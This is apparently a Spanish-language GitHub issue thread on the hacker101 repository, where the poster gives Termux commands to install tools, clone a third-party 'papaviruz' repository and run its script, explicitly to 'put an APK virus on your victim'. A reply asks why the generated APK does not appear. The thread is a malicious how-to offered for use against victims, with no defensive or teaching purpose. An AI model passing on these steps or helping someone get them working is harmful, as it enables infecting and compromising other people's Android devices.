### ISSUE TITLE
Crear virus Android

### ISSUE THREAD

**Issue by Anonymous0508** [Hacker0x01/hacker101#103]
Comandos para meterle un virus apk a tu victima

espero y les guste

Comandos

$ pkg update 
$ pkg upgrade 
$ pkg install bash 
$ apt install pv 
$ pkg install git 
$ git clone https://github.com/Hacking-pch/papaviruz $ cd papaviruz $ chmod +x papaviruz.sh $ bash papaviruz.sh

eso es todos mis queridos hackers los daluda su amigo 
**Anonymous0508**

**Comment by Green2049** [comment]
Hola Bro Porque Me Sale Que Se Mueve a Tal Lugar Y No aparece La Apk Me Ayudarías?
